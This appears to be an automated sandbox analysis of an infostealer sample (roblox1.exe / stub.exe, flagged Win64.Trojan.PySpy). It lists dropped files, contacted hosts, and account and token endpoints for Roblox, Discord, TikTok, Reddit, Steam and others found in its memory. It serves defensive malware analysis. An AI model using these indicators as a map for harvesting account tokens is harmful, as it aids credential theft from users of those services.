                  C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\_queue.pyd0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\_socket.pyd0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\_sqlite3.pyd0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\_ssl.pyd0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\_uuid.pyd0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\aiohttp\_helpers.pyd0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\aiohttp\_http_parser.pyd0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\aiohttp\_http_writer.pyd0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\aiohttp\_websocket.pyd0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\cryptography\hazmat\bindings\_rust.pyd0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\frozenlist\_frozenlist.pyd0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\libcrypto-1_1.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\libffi-7.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\libssl-1_1.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\multidict\_multidict.pyd0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\pyexpat.pyd0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\python3.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\python310.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\select.pyd0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\sqlite3.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe71%ReversingLabsWin64.Trojan.PySpy
                  C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\unicodedata.pyd0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\vcruntime140.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\yarl\_helpers_c.pyd0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\yarl\_quoting_c.pyd0%ReversingLabs

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  https://www.attrs.org/)0%Avira URL Cloudsafe
                  https://twitter.comarefereruhttps://twitter.com/homeusec-fetch-destaemptyusec-fetch-modeacorsusec-fe0%Avira URL Cloudsafe
                  https://www.attrs.org/en/stable/init.html#hooking-yourself-into-initialization)0%Avira URL Cloudsafe
                  https://www.attrs.org/en/latest/names.html)0%Avira URL Cloudsafe
                  https://www.attrs.org/en/stable/changelog.html0%Avira URL Cloudsafe
                  http://docs.aiohttp.org/en/stable/logging.html#format-specificationauvloopaset_event_loop_policyaEve0%Avira URL Cloudsafe
                  https://www.variomedia.de/0%Avira URL Cloudsafe
                  https://bugs.python.org/issue371790%Avira URL Cloudsafe
                  https://docs.aiohttp.org/en/stable/web_advanced.html#application-s-config0%Avira URL Cloudsafe
                  https://filepreviews.io/0%Avira URL Cloudsafe
                  https://www.attrs.org/en/latest/glossary.html#term-dunder-methods)).0%Avira URL Cloudsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  restores.name
                  		135.181.65.219
                  		truefalse
                    		unknown
                    ip-api.com
                    		208.95.112.1
                    		truefalse
                      		high

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://ip-api.com/jsonfalse
                        		high

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        https://account.riotgames.com/api/account/v1/userroblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmpfalse
                          		high
                          https://accounts.reddit.com/api/access_tokenroblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmpfalse
                            		high
                            https://api.steampowered.com/ISteamUser/GetPlayerSummaries/v0002/?key=440D7F4D810EF9298D25EDDF37C1F9stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmpfalse
                              		high
                              https://github.com/pyca/cryptography/issues/8996roblox1.exe, 00000000.00000003.1539994673.000001B301C9A000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://github.com/python-attrs/attrs/issues/251roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1940431612.00000213BE4FA000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1552093383.00000213BE4C3000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  https://klaviyo.com/roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1942471235.00000213BC233000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1549220598.00000213BC232000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1940038394.00000213BC232000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    https://tiktok.com/stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmpfalse
                                      		high
                                      https://www.python.org/dev/peps/pep-0506/roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpfalse
                                        		high
                                        https://i.instagram.com/api/v1/accounts/current_user/?edit=trueuhttps://i.instagram.com/api/v1/usersroblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpfalse
                                          		high
                                          https://github.com/aio-libs/aiohttp/discussions/6044roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1940824169.00000213BED1E000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1937485075.00000213BECD9000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1944604841.00000213BE310000.00000004.00001000.00020000.00000000.sdmpfalse
                                            		high
                                            http://python.orgroblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000002.1946175818.00000213BE880000.00000004.00001000.00020000.00000000.sdmpfalse
                                              		high
                                              https://python.org/dev/peps/pep-0263/roblox1.exe, 00000000.00000003.1539994673.000001B301922000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1961361267.00007FFBAAD33000.00000002.00000001.01000000.00000005.sdmpfalse
                                                		high
                                                https://www.attrs.org/en/24.2.0/_static/sponsors/roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1942471235.00000213BC233000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1549220598.00000213BC232000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1940038394.00000213BC232000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://python.org:80roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000002.1946175818.00000213BE880000.00000004.00001000.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://github.com/sponsors/hynekstub.exe, 00000003.00000003.1940038394.00000213BC232000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://github.com/python-attrs/attrs/issues/1328)roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1942471235.00000213BC233000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1549220598.00000213BC232000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1940038394.00000213BC232000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://oauth.reddit.com/api/v1/meroblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://raw.githubusercontent.com/python-attrs/attrs/main/docs/_static/attrs_logo.svgroblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1942471235.00000213BC233000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1549220598.00000213BC232000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1940038394.00000213BC232000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://tidelift.com/?utm_source=lifter&utm_medium=referral&utm_campaign=hynek).roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1942471235.00000213BC233000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1549220598.00000213BC232000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1940038394.00000213BC232000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://ip-api.com/jsonacityatimezoneaispaorgaasuMain.GetNetworkInfoTroblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpfalse
                                                                		high
                                                                https://www.attrs.org/en/stable/init.html#hooking-yourself-into-initialization)roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1942471235.00000213BC233000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1549220598.00000213BC232000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1940038394.00000213BC232000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://github.com/python-attrs/attrs)roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1942471235.00000213BC233000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1549220598.00000213BC232000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1940038394.00000213BC232000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://www.attrs.org/)roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1942471235.00000213BC233000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1549220598.00000213BC232000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1940038394.00000213BC232000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://www.ibm.com/roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpfalse
                                                                    		high
                                                                    https://twitter.comroblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://www.reddit.com/user/acomment_karmaatotal_karmaais_modais_goldais_suspendedaprofileUrluroblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpfalse
                                                                        		high
                                                                        https://gql.twitch.tv/gqlTroblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpfalse
                                                                          		high
                                                                          https://twitter.com/homeroblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://discord.com/api/v9/users/stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://www.roblox.com/my/account/jsonuhttps://economy.roblox.com/v1/users/aresaUserIdu/currencyuhttroblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpfalse
                                                                                		high
                                                                                http://docs.python.org/3/library/subprocess#subprocess.Popen.killroblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000002.1946175818.00000213BE880000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://github.com/python-attrs/attrs/issues/136roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1940431612.00000213BE4FA000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpfalse
                                                                                    		high
                                                                                    https://www.tiktok.com/passport/web/account/info/?aid=1459&app_language=de-DE&app_name=tiktok_web&bastub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1940038394.00000213BC232000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://docs.aiohttp.org/en/stable/logging.html#format-specificationauvloopaset_event_loop_policyaEveroblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      http://crl.dhimyotis.com/certignarootca.crlstub.exe, 00000003.00000003.1936161103.00000213BEEF2000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1935734211.00000213BEEE4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://curl.haxx.se/rfc/cookie_spec.htmlroblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpfalse
                                                                                          		high
                                                                                          http://ocsp.accv.esstub.exe, 00000003.00000003.1934773835.00000213BEF56000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1936075447.00000213BEFA1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://speleotrove.com/decimal/decarith.htmlroblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpfalse
                                                                                              		high
                                                                                              http://docs.python.org/3/library/subprocess#subprocess.Popen.returncoderoblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000002.1945691017.00000213BE610000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://github.com/python-attrs/attrs/issues/1329)roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1942471235.00000213BC233000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1549220598.00000213BC232000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1940038394.00000213BC232000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://webcast.tiktok.com/webcast/wallet_api/diamond_buy/permission/?aid=1988&app_language=de-DE&apstub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpfalse
                                                                                                    		high
                                                                                                    http://json.orgstub.exe, 00000003.00000002.1945050010.00000213BE410000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1940139383.00000213BE111000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1944291079.00000213BE1F4000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1940263810.00000213BE1F3000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1551665105.00000213BE184000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1938249531.00000213BE1CA000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1941279881.00000213BE162000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1917018094.00000213BE1CA000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1937231343.00000213BE1CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://cdn.discordapp.com/avatars/u.pngu.gifuunsupportedroblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpfalse
                                                                                                        		high
                                                                                                        https://github.com/python-attrs/attrs/issues/1330)roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1942471235.00000213BC233000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1549220598.00000213BC232000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1940038394.00000213BC232000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://open.spotify.com/user/uroblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpfalse
                                                                                                            		high
                                                                                                            https://wwww.certigna.fr/autorites/0mstub.exe, 00000003.00000003.1935734211.00000213BEEE4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://support.mozilla.org/products/firefoxgro.allizom.troppus.elMx_wJzrE6lstub.exe, 00000003.00000003.1698207529.00000213BEF58000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://discord.com/api/v8/users/stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://twitter.com/i/api/1.1/account/update_profile.jsonareqadescriptionuThereroblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://www.attrs.org/en/latest/names.html)roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1942471235.00000213BC233000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1549220598.00000213BC232000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1940038394.00000213BC232000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    		unknown
                                                                                                                    https://www.twitch.tv/roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://crl.xrampsecurity.com/XGCA.crl2stub.exe, 00000003.00000003.1938775730.00000213BED9C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://accounts.reddit.com/api/access_tokenaaccess_tokenuandroid:com.example.myredditapp:v1.2.3uBearoblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://wwww.certigna.fr/autorites/stub.exe, 00000003.00000003.1936161103.00000213BEEF2000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1936493443.00000213BEEF3000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1935734211.00000213BEEE4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://cryptography.io/en/latest/faq/#why-can-t-i-import-my-pem-fileroblox1.exe, 00000000.00000003.1539994673.000001B301C9A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://open.spotify.com/user/roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                http://www.cl.cam.ac.uk/~mgk25/iso-time.htmlroblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000002.1944604841.00000213BE310000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://api.steampowered.com/IPlayerService/GetOwnedGames/v1/?key=440D7F4D810EF9298D25EDDF37C1F902&sroblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://filepreviews.io/roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1942471235.00000213BC233000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1549220598.00000213BC232000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1940038394.00000213BC232000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                    		unknown
                                                                                                                                    https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brstub.exe, 00000003.00000002.1946318506.00000213BE9A0000.00000004.00001000.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1939941508.00000213BED89000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://www.attrs.org/en/stable/why.html#data-classes)roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1942471235.00000213BC233000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1549220598.00000213BC232000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1940038394.00000213BC232000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://t.me/TaroCloudFreelogsroblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          http://crl.securetrust.com/STCA.crlstub.exe, 00000003.00000003.1938775730.00000213BED9C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            http://wwwsearch.sf.net/):roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0stub.exe, 00000003.00000003.1934773835.00000213BEF56000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1936295098.00000213BEFCD000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1936075447.00000213BEFA1000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1934931290.00000213BEFB8000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1935684148.00000213BEFC8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                http://www.accv.es/legislacion_c.htmstub.exe, 00000003.00000003.1939279507.00000213BEFBF000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1934931290.00000213BEFB8000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1936295098.00000213BEFBF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
